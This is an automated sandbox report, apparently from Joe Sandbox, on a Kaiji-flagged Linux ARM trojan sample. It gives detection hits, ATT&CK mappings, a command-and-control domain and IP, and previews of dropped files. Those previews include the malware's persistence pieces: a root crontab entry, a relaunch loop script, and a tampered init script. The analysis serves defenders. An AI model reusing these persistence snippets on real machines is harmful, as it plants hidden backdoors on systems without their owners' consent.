              Source: opt.services.cfg, 5728.1.00007ffe090c3000.00007ffe090e4000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/etc/opt.services.cfg
              Source: systemd, 5566.1.00007fff061d1000.00007fff061f2000.rw-.sdmp, System.mod, 5566.1.00007fff061d1000.00007fff061f2000.rw-.sdmpBinary or memory string: cx86_64/usr/bin/qemu-arm/boot/System.modLANG=en_US.UTF-8PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binSERVICE_RESULT=successEXIT_CODE=exitedEXIT_STATUS=0INVOCATION_ID=0fc38d058b1e40c5b3ac4fb528025dddJOURNAL_STREAM=9:64498/boot/System.mod
              Source: libgdi.so.0.8.1, 5766.1.00007fff7cebd000.00007fff7cede000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/usr/lib/libgdi.so.0.8.1
              Source: linux_arm6.elf, 5483.1.00005638b5371000.00005638b59c2000.rw-.sdmpBinary or memory string: 8Vrg.qemu.gdb.arm.sys.regs">
              Source: systemd, 5566.1.0000561d8391f000.0000561d83f54000.rw-.sdmp, System.mod, 5566.1.0000561d8391f000.0000561d83f54000.rw-.sdmpBinary or memory string: Vrg.qemu.gdb.arm.sys.regs">
              Source: linux_arm6.elf, 5483.1.00005638b5371000.00005638b59c2000.rw-.sdmpBinary or memory string: 8V!/etc/qemu-binfmt/arm
              Source: open-vm-tools.14.drBinary or memory string: start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd
              Source: opt.services.cfg, 5728.1.00007f4cdc000000.00007f4cdc0b1000.rw-.sdmpBinary or memory string: rg.qemu.gdb.arm.sys.regs">5M
              Source: open-vm-tools.14.drBinary or memory string: log_daemon_msg "Stopping open-vm guest daemon" "vmtoolsd"
              Source: 32675, 5723.1.00007ffdcf7c2000.00007ffdcf7e3000.rw-.sdmp, opt.services.cfg, 5723.1.00007ffdcf7c2000.00007ffdcf7e3000.rw-.sdmpBinary or memory string: !x86_64/usr/bin/qemu-arm/etc/opt.services.cfgSHELL=/bin/bashCOLORTERM=truecolorSUDO_GID=1000SUDO_COMMAND=/bin/bashSUDO_USER=saturninoPWD=/tmpLOGNAME=rootXAUTHORITY=/run/user/1000/gdm/XauthorityHOME=/rootLANG=en_US.UTF-8TERM=xterm-256colorUSER=rootDISPLAY=:1.0SHLVL=1PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binSUDO_UID=1000MAIL=/var/mail/root_=/etc/opt.services.cfg/etc/opt.services.cfg
              Source: open-vm-tools.14.drBinary or memory string: echo "open-vm-tools: not starting as this is not a VMware VM"
              Source: libgdi.so.0.8.1, 5766.1.000055dc9f671000.000055dc9fca8000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
              Source: libgdi.so.0.8.1, 5766.1.00007f9460000000.00007f94600b3000.rw-.sdmpBinary or memory string: .qemu.gdb.arm.sys.regs"><reg name="AMAIR0_S" bitsize="32" group="cp_regs"/><reg name="AFSR0_EL1" bitsize="32" group="cp_
              Source: libgdi.so.0.8.1, 5766.1.00007fff7cebd000.00007fff7cede000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
              Source: systemd, 5566.1.0000561d8391f000.0000561d83f54000.rw-.sdmp, System.mod, 5566.1.0000561d8391f000.0000561d83f54000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/arm
              Source: open-vm-tools.14.drBinary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd -- --background /var/run/vmtoolsd.pid || exit 2

              Stealing of Sensitive Information

              barindex
              Yara detected Kaiji
              Source: Yara matchFile source: linux_arm6.elf, type: SAMPLE
              Source: Yara matchFile source: /boot/System.mod, type: DROPPED
              Source: Yara matchFile source: /etc/opt.services.cfg, type: DROPPED
              Source: Yara matchFile source: /usr/bin/include/ss, type: DROPPED
              Source: Yara matchFile source: /usr/bin/include/ls, type: DROPPED
              Source: Yara matchFile source: /usr/bin/include/ps, type: DROPPED
              Source: Yara matchFile source: /usr/bin/dir, type: DROPPED
              Source: Yara matchFile source: /usr/lib/system-mark, type: DROPPED
              Source: Yara matchFile source: /usr/bin/include/netstat, type: DROPPED
              Source: Yara matchFile source: /usr/lib/libgdi.so.0.8.1, type: DROPPED
              Source: Yara matchFile source: /etc/profile.d/bash_cfg, type: DROPPED
              Source: Yara matchFile source: /usr/bin/find, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected Kaiji
              Source: Yara matchFile source: linux_arm6.elf, type: SAMPLE
              Source: Yara matchFile source: /boot/System.mod, type: DROPPED
              Source: Yara matchFile source: /etc/opt.services.cfg, type: DROPPED
              Source: Yara matchFile source: /usr/bin/include/ss, type: DROPPED
              Source: Yara matchFile source: /usr/bin/include/ls, type: DROPPED
              Source: Yara matchFile source: /usr/bin/include/ps, type: DROPPED
              Source: Yara matchFile source: /usr/bin/dir, type: DROPPED
              Source: Yara matchFile source: /usr/lib/system-mark, type: DROPPED
              Source: Yara matchFile source: /usr/bin/include/netstat, type: DROPPED
              Source: Yara matchFile source: /usr/lib/libgdi.so.0.8.1, type: DROPPED
              Source: Yara matchFile source: /etc/profile.d/bash_cfg, type: DROPPED
              Source: Yara matchFile source: /usr/bin/find, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information2
              Scripting              		Valid Accounts1
              Command and Scripting Interpreter              		1
              Unix Shell Configuration Modification              		1
              Unix Shell Configuration Modification              		12
              Masquerading              		1
              OS Credential Dumping              		11
              Security Software Discovery              		Remote ServicesData from Local System1
              Non-Standard Port              		Exfiltration Over Other Network Medium1
              Data Manipulation
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Systemd Service              		1
              Systemd Service              		1
              Hide Artifacts              		LSASS Memory1
              Virtualization/Sandbox Evasion              		Remote Desktop ProtocolData from Removable Media1
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Scripting              		Logon Script (Windows)1
              Virtualization/Sandbox Evasion              		Security Account Manager1
              File and Directory Discovery              		SMB/Windows Admin SharesData from Network Shared Drive1
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              File and Directory Permissions Modification              		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Hidden Files and Directories              		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              Malware Configuration

              No configs have been found

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572673 Sample: linux_arm6.elf Startdate: 10/12/2024 Architecture: LINUX Score: 76 97 cc.ava9527.cc 93.123.85.138, 36016, 60888 NET1-ASBG Bulgaria 2->97 99 www.google.com 2->99 103 Multi AV Scanner detection for submitted file 2->103 105 Yara detected Kaiji 2->105 11 linux_arm6.elf 2->11         started        13 systemd cron 2->13         started        15 systemd cron 2->15         started        17 6 other processes 2->17 signatures3 process4 process5 19 linux_arm6.elf linux_arm6.elf 11->19         started        23 cron 13->23         started        25 cron 15->25         started        27 System.mod System.mod 17->27         started        29 System.mod System.mod 17->29         started        file6 87 /usr/lib/system-mark, ELF 19->87 dropped 89 /usr/lib/libgdi.so.0.8.1, ELF 19->89 dropped 91 /usr/bin/ss, ELF 19->91 dropped 93 63 other files (62 malicious) 19->93 dropped 107 Sample tries to set files in /etc globally writable 19->107 109 Writes identical ELF files to multiple locations 19->109 111 Sample tries to persist itself using /etc/profile 19->111 113 Drops files in suspicious directories 19->113 31 linux_arm6.elf bash 19->31         started        35 linux_arm6.elf service systemctl 19->35         started        37 linux_arm6.elf service systemctl 19->37         started        43 6 other processes 19->43 39 cron sh 23->39         started        41 cron sh 25->41         started        signatures7 process8 file9 95 /etc/crontab, ASCII 31->95 dropped 101 Sample tries to persist itself using cron 31->101 45 service 35->45         started        47 service basename 35->47         started        57 2 other processes 35->57 49 service 37->49         started        59 3 other processes 37->59 51 sh .mod 39->51         started        53 sh .mod 41->53         started        55 bash 32675 43->55         started        61 7 other processes 43->61 signatures10 process11 process12 63 service systemctl 45->63         started        65 service sed 45->65         started        67 service systemctl 49->67         started        69 service sed 49->69         started        71 .mod libgdi.so.0.8.1 51->71         started        73 .mod libgdi.so.0.8.1 53->73         started        75 32675 opt.services.cfg 55->75         started        77 32675 sleep 55->77         started        79 32675 sleep 55->79         started        process13 81 libgdi.so.0.8.1 libgdi.so.0.8.1 71->81         started        83 libgdi.so.0.8.1 libgdi.so.0.8.1 73->83         started        85 opt.services.cfg opt.services.cfg 75->85         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              linux_arm6.elf34%ReversingLabsLinux.Trojan.Kaiji

              Dropped Files

              SourceDetectionScannerLabelLink
              /.mod0%ReversingLabs
              /boot/System.mod34%ReversingLabsLinux.Trojan.Kaiji
              /etc/326750%ReversingLabs
              /etc/init.d/acpid0%ReversingLabs
              /etc/init.d/alsa-utils0%ReversingLabs
              /etc/init.d/anacron0%ReversingLabs
              /etc/init.d/apparmor0%ReversingLabs
              /etc/init.d/avahi-daemon0%ReversingLabs
              /etc/init.d/binfmt-support0%ReversingLabs
              /etc/init.d/bluetooth0%ReversingLabs
              /etc/init.d/console-setup.sh0%ReversingLabs
              /etc/init.d/cron0%ReversingLabs
              /etc/init.d/cryptdisks0%ReversingLabs
              /etc/init.d/cryptdisks-early0%ReversingLabs
              /etc/init.d/cups0%ReversingLabs
              /etc/init.d/cups-browsed0%ReversingLabs
              /etc/init.d/dbus0%ReversingLabs
              /etc/init.d/gdm30%ReversingLabs
              /etc/init.d/hddtemp0%ReversingLabs
              /etc/init.d/hwclock.sh0%ReversingLabs
              /etc/init.d/irqbalance0%ReversingLabs
              /etc/init.d/iscsid0%ReversingLabs
              /etc/init.d/keyboard-setup.sh0%ReversingLabs

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.google.com
              		142.250.181.68
              		truefalse
                		high
                cc.ava9527.cc
                		93.123.85.138
                		truefalse
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.gnu.org/software/coreutils/ls.14.dr, dir.14.drfalse
                    		high
                    http://html4/loose.dtdSystem.mod, 5555.1.00007f47904bf000.00007f4790514000.rw-.sdmp, systemd, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, System.mod, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, linux_arm6.elf, ps0.14.dr, System.mod.14.dr, find0.14.dr, ss0.14.dr, bash_cfg.14.dr, opt.services.cfg.14.dr, system-mark.14.dr, ls0.14.dr, libgdi.so.0.8.1.14.dr, netstat0.14.dr, dir0.14.drfalse
                      		high
                      https://translationproject.org/team/dir.14.drfalse
                        		high
                        https://wiki.xiph.org/MIME_Types_and_File_Extensions.ogvls.14.dr, dir.14.drfalse
                          		high
                          https://gnu.org/licenses/gpl.htmlls.14.dr, dir.14.drfalse
                            		high
                            https://github.com/lsof-org/lsoflsof.14.drfalse
                              		high
                              https://wiki.xiph.org/MIME_Types_and_File_Extensionsls.14.dr, dir.14.drfalse
                                		high
                                https://www.gnu.org/gethelp/ls.14.dr, dir.14.drfalse
                                  		high
                                  https://github.com/lsof-org/lsof/blob/master/Lsof.8lsof.14.drfalse
                                    		high
                                    http://.cssSystem.mod, 5555.1.00007f47904bf000.00007f4790514000.rw-.sdmp, systemd, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, System.mod, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, linux_arm6.elf, ps0.14.dr, System.mod.14.dr, find0.14.dr, ss0.14.dr, bash_cfg.14.dr, opt.services.cfg.14.dr, system-mark.14.dr, ls0.14.dr, libgdi.so.0.8.1.14.dr, netstat0.14.dr, dir0.14.drfalse
                                      		high
                                      https://github.com/lsof-org/lsof/blob/master/00FAQlsof.14.drfalse
                                        		high
                                        https://www.gnu.org/software/coreutils/Reportls.14.dr, dir.14.drfalse
                                          		high
                                          https://github.com/lsof-org/lsofhttps://github.com/lsof-org/lsof/blob/master/00FAQhttps://github.comlsof.14.drfalse
                                            		high
                                            http://.jpgSystem.mod, 5555.1.00007f47904bf000.00007f4790514000.rw-.sdmp, systemd, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, System.mod, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, linux_arm6.elf, ps0.14.dr, System.mod.14.dr, find0.14.dr, ss0.14.dr, bash_cfg.14.dr, opt.services.cfg.14.dr, system-mark.14.dr, ls0.14.dr, libgdi.so.0.8.1.14.dr, netstat0.14.dr, dir0.14.drfalse
                                              		high
                                              https://wiki.xiph.org/MIME_Types_and_File_Extensions.ogals.14.dr, dir.14.drfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                93.123.85.138
                                                		cc.ava9527.ccBulgaria
                                                		43561NET1-ASBGfalse

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                93.123.85.138linux_arm7.elfGet hashmaliciousKaijiBrowse
                                                  YnJQfHqRbG.elfGet hashmaliciousUnknownBrowse
                                                    1316wjL1Ep.elfGet hashmaliciousUnknownBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      www.google.comhttp://enteolcl.top/Get hashmaliciousUnknownBrowse
                                                      • 142.250.181.68
                                                      CMK7DB5YtR.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 172.217.21.36
                                                      XrQ8NgQHTn.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 172.217.21.36
                                                      https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.comGet hashmaliciousCaptcha PhishBrowse
                                                      • 142.250.181.68
                                                      FG Or#U00e7amento JAN 2025.pdfGet hashmaliciousUnknownBrowse
                                                      • 142.250.181.68
                                                      https://lovesolvingastrologer.com/n/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9Y2tGd05VYz0mdWlkPVVTRVIwMzEyMjAyNFUwNzEyMDMyMQGet hashmaliciousUnknownBrowse
                                                      • 172.217.21.36
                                                      https://desactivacion-correo.s3.eu-north-1.amazonaws.com/es.htmlGet hashmaliciousUnknownBrowse
                                                      • 172.217.21.36
                                                      https://app.droplet.io/form/Ko1loyGet hashmaliciousUnknownBrowse
                                                      • 172.217.21.36
                                                      http://riginaros.blogspot.com/#x034rT96G0Get hashmaliciousPorn ScamBrowse
                                                      • 142.250.181.68
                                                      https://8lye.zemifor.ru/AELKFIZNEFDBTAHDVVECCPNIETD459FBOSL3MNKP6ZQ?akpsmqmipdifvgvgwktrpvk235317236085203wfjcuo8jl4u8d22sbGet hashmaliciousUnknownBrowse
                                                      • 142.250.181.68
                                                      cc.ava9527.cclinux_arm7.elfGet hashmaliciousKaijiBrowse
                                                      • 93.123.85.138
                                                      linux_arm5.elfGet hashmaliciousKaijiBrowse
                                                      • 23.224.121.29
                                                      linux_aarch64.elfGet hashmaliciousKaijiBrowse
                                                      • 23.224.121.29
                                                      linux_amd64.elfGet hashmaliciousKaijiBrowse
                                                      • 23.224.121.29
                                                      linux_arm7.elfGet hashmaliciousKaijiBrowse
                                                      • 23.224.121.29
                                                      linux_arm6.elfGet hashmaliciousKaijiBrowse
                                                      • 23.224.121.29

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      NET1-ASBGa-r.m-7.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 93.123.85.251
                                                      m-i.p-s.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 93.123.85.251
                                                      x-8.6-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 93.123.85.251
                                                      x-3.2-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 93.123.85.251
                                                      a-r.m-4.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 93.123.85.251
                                                      a-r.m-5.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 93.123.85.251
                                                      m-6.8-k.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 93.123.85.251
                                                      i-5.8-6.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 93.123.85.251
                                                      s-h.4-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 93.123.85.251
                                                      a-r.m-6.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 93.123.85.251

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      /.modlinux_arm7.elfGet hashmaliciousKaijiBrowse
                                                        linux_aarch64.elfGet hashmaliciousKaijiBrowse
                                                          linux_386.elfGet hashmaliciousKaijiBrowse
                                                            linux_arm7.elfGet hashmaliciousKaijiBrowse
                                                              utZX7JAuMU.elfGet hashmaliciousKaijiBrowse
                                                                fL4E1jNVCt.elfGet hashmaliciousKaijiBrowse
                                                                  Xq5coKA8BI.elfGet hashmaliciousKaijiBrowse
                                                                    Ww0lpzmYHO.elfGet hashmaliciousKaijiBrowse
                                                                      c4RvDuLtq1.elfGet hashmaliciousKaijiBrowse
                                                                        linux_arm5.elfGet hashmaliciousKaijiBrowse

                                                                          Created / dropped Files

                                                                          /.mod

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:Bourne-Again shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):36
                                                                          Entropy (8bit):3.9931325576478587
                                                                          Encrypted:false
                                                                          SSDEEP:3:TKH/LQP5o:8M2
                                                                          MD5:FF0DB01AA3465358D28FD34FE8479236
                                                                          SHA1:DBE00D4EAD9F9FE3D8B97CBDCA1F2EFD5EF86EEF
                                                                          SHA-256:BF659AA5C483CF60E1E7626EEC9FAE7AE182CC611A3F42B2521F8A8C018C7195
                                                                          SHA-512:F414CE5B5A10DD25EA22CA123473604445411E056F4310DFE1C09AECE6B16CB5AD8B989070201594025A6DBE319FE87A871E63209E977EE185EF302689F048B2
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: linux_arm7.elf, Detection: malicious, Browse
                                                                          • Filename: linux_aarch64.elf, Detection: malicious, Browse
                                                                          • Filename: linux_386.elf, Detection: malicious, Browse
                                                                          • Filename: linux_arm7.elf, Detection: malicious, Browse
                                                                          • Filename: utZX7JAuMU.elf, Detection: malicious, Browse
                                                                          • Filename: fL4E1jNVCt.elf, Detection: malicious, Browse
                                                                          • Filename: Xq5coKA8BI.elf, Detection: malicious, Browse
                                                                          • Filename: Ww0lpzmYHO.elf, Detection: malicious, Browse
                                                                          • Filename: c4RvDuLtq1.elf, Detection: malicious, Browse
                                                                          • Filename: linux_arm5.elf, Detection: malicious, Browse
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:#!/bin/bash./usr/lib/libgdi.so.0.8.1

                                                                          /boot/System.mod

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /boot/System.mod, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 34%
                                                                          Reputation:low
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................

                                                                          /etc/.walk

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):147
                                                                          Entropy (8bit):3.8929148542482728
                                                                          Encrypted:false
                                                                          SSDEEP:3:3Rk4WtwyI6UB4cSzB4WtwyI6UB4cSl2TLQdHjhOdQBHXWcMn:hRt6jqt612MdHjcy3Wxn
                                                                          MD5:928DC505FE148F5101AD11910FDAAFAF
                                                                          SHA1:E9186E46B13F5B337611594B58EDC78A706F31BD
                                                                          SHA-256:738764F68B68F10E93C51C0ECF1B842AE48E30E04560334C3EAD15A9F0CEED52
                                                                          SHA-512:BC00743B8574D7B96BC139D7466203232D29AB238239B0C00F5AE293D5CB40874DC2F74DF967722461F649A93082684300B153DC448BD9294C7ECE2770D98688
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:e74ed74ec65f017ed1638a49c1350a23fc5dea11de2c797a.e74ed74ec65f017ed1638a49c1350a23fc5dea11de2c797a.e464ed5cf25f2831d065cf4dc1350d7ee85d8a5fc939277a.

                                                                          /etc/32675

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:Bourne-Again shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):63
                                                                          Entropy (8bit):4.619727741986734
                                                                          Encrypted:false
                                                                          SSDEEP:3:TKH/zOsUF4K0WJTD0HXD:LsUF4kDYXD
                                                                          MD5:6CB66DDA6E7B14F42654921B3EC25226
                                                                          SHA1:B39354C512D130E1C52E9163DC12C4D5704A60A7
                                                                          SHA-256:45A2B263B893B33C703B7E5F64F04DE776D1DC9578BE65C5047195CD531FEF2A
                                                                          SHA-512:91A32A8C6B9490CB31CDB79C2E8697DAF1637C63136658B46037D60ED47D2B6D685F62D526E87960BAF93C6875295CF0C892EDAF65B34CBEB00D9961FEE7938B
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:#!/bin/bash.while [ 1 ]; do.sleep 60./etc/opt.services.cfg.done

                                                                          /etc/crontab

                                                                          Download File
                                                                          Process:/bin/bash
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):24
                                                                          Entropy (8bit):3.000961982762677
                                                                          Encrypted:false
                                                                          SSDEEP:3:HFdtKeIBFv:l6eIBV
                                                                          MD5:6B13F24B625DC5B832A4AE80CFAB7DDA
                                                                          SHA1:8D0BAF4556328F9CEFB4041D67CB6BF30570AF84
                                                                          SHA-256:AC95234D459AA020883AF0A93879C835582CB60D7DD63C68F33993BA2546661F
                                                                          SHA-512:76774BF236D5DB77B09BFD2A36F190B86AC7DA7147C635CAF06A1884E151345585803885AD1FCBD60F566A48F165CBF8B445B506047CBC0A9924BF79B4C8E289
                                                                          Malicious:true
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:*/1 * * * * root /.mod .

                                                                          /etc/init.d/acpid

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):2304
                                                                          Entropy (8bit):5.099881186780916
                                                                          Encrypted:false
                                                                          SSDEEP:48:9tdVEA2+3MPMiOMdxA3Gbsbcq1himLHLHmvgjWL:9tdVEA2+3MPiI3Qbcq1Q4Hrmvt
                                                                          MD5:BD41974D1C7269BD429343943C8ED10A
                                                                          SHA1:D99E55E32229483A694B8B2EFEC8D15CF1C8FCCE
                                                                          SHA-256:56044D786BA8F4B11DDF9DBC88502ECE10246991CA383F913E9B86E57F19A28E
                                                                          SHA-512:A386FA323285EF24A9A442A5CEB8D9B2A36409B7BEC2D729031C7F83C6F3664EA1A745D35CA487A25FC953B6197F3A9FF1B35EEEFD2F90262BC2EEA7BB89D522
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: acpid.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# X-Start-Before: kdm gdm3 xdm lightdm.# X-Stop-After: kdm gdm3 xdm lightdm.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: Start the Advanced Configuration and Power Interface daemon.# Description: Provide a socket for X11, hald and others to multiplex.# kernel ACPI events..### END INIT INFO..set -e..ACPID="/usr/sbin/acpid".DEFAULTS="/etc/default/acpid"..# Check for daemon presence.[ -x "$ACPID" ] || exit 0..OPTIONS="".MODULES="".# Include acpid defaults if available.[ -r "$DEFAULTS" ] && . "$DEFAULTS"..# Get lsb functions.. /lib/lsb/init-functions..# As the name says. If the kernel supports modules, it'll try to load.# the ones listed in "MODULES"..load_modules() {. [ -f /proc/modules ] || return 0. if [ "$MODULES" = "all" ]; then./lib/system-mark. MODULES="$(sed -rn 's#^(/lib/mod

                                                                          /etc/init.d/alsa-utils

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:POSIX shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):5694
                                                                          Entropy (8bit):5.4204403708834565
                                                                          Encrypted:false
                                                                          SSDEEP:96:iKtDd9/iwmDaLEuE9nwsmFRzF+rc17NyppyhHk5eEkv:iCdlW6EuUnZeRB+rc15yryZkq
                                                                          MD5:14EB05544D93BC0B09262334CCB79F2C
                                                                          SHA1:620AC9E2B5A23703A568800376CE590445FDFBD5
                                                                          SHA-256:C52ED6032904A94A0B83DCD1CDFA83D48DA29D049A5F29BB90265492120183E4
                                                                          SHA-512:83DCDC085FBFEEC1843D8C5E8978162AA34F9ECD0E7BF4E8BBF8D8D005837FF6A69F56BF7988400CB5AF07A5AF63D6471BD8BC2DAE223CDA3500F07B0EE9C36B
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
